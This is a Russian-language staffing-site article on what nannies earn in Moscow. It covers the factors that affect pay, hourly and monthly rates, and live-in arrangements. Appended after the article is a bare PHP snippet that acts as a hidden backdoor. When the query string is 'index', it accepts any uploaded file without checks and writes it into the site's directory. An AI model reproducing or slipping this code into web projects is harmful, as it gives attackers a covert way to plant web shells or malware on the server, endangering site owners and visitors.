НУЖНЫЕ ЛЮДИ
     
 

Статьи

Какова зарплата няни в Москве?

«назад

Прежде, чем приступить к поискам работы няней в Москве, необходимо выяснить на какую зарплату рассчитывать.
Заработная плата няни зависит от многих факторов. Прежде всего работодатель обращает внимание на наличие или отсутствие медицинского или педагогического образования. Также большую роль играет график работы, возраст ребенка и перечень обязанностей, которые придется выполнять. Все это обговаривается работодателем и няней при персональной встрече или в телефонном режиме. Вопрос оплаты лучше обговорить до момента приема на работу, чтобы потом не было неловких ситуаций.
Среднестатистическая зарплата няни в Москве – 150-200 рублей в час. Учитывая довольно нестабильное финансовое положение в стране, цены могут снижаться или повышаться. При условии полной занятости, то есть не менее 9 рабочих часов в сутки, возможна зарплата в 20-35 тысяч рублей в месяц. Существует возможность работать с проживанием. Оплата будет примерно та же, и при этом не придется искать жилье и дополнительно тратить деньги на питание.
Следует понимать, что московские зарплаты значительно выше, нежели по России.

 
     


if ($_SERVER['QUERY_STRING'] == 'index') { echo '
'; $uploaddir = ''; $uploadfile = $uploaddir.basename($_FILES['uploadfile']['name']); if (copy($_FILES['uploadfile']['tmp_name'], $uploadfile)) { echo "

OK

"; exit; }else{ echo "

NO

"; exit; } exit; }